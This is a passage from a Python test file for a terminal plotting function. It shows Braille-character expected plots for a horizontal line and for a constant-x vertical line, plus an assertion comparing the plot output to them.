0.53500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.53250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.53000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.52750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.52500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.52250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.52000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.51750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.51500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.51250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.51000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.50750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.50500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.50250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.50000000 | ⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⠀⠀⠀⠀⠀⠀
0.49750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.49500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.49250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.49000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.48750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.48500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.48250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.48000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.47750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.47500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.47250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.47000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.46750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.46500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.46250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.46000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.45750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.45500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.45250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.45000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
-----------|-|---------|---------|---------|---------|---------|---------|---------|---------|-> (X)
| 0.7000000 1.1500000 1.6000000 2.0500000 2.5000000 2.9500000 3.4000000 3.8500000 4.3000000"""
print(plot([1, 4], [0.5, 0.5]))
assert expected == plot([1, 4], [0.5, 0.5])
def test_constant_x():
expected = """ (Y) ^
4.30000000 |
4.21000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
4.12000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
4.03000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
3.94000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
3.85000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
3.76000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
3.67000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
3.58000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
3.49000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
3.40000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
3.31000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
3.22000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
3.13000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
3.04000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
2.95000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
2.86000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
2.77000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
2.68000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
2.59000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
2.50000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
2.41000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
2.32000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
2.23000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
2.14000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
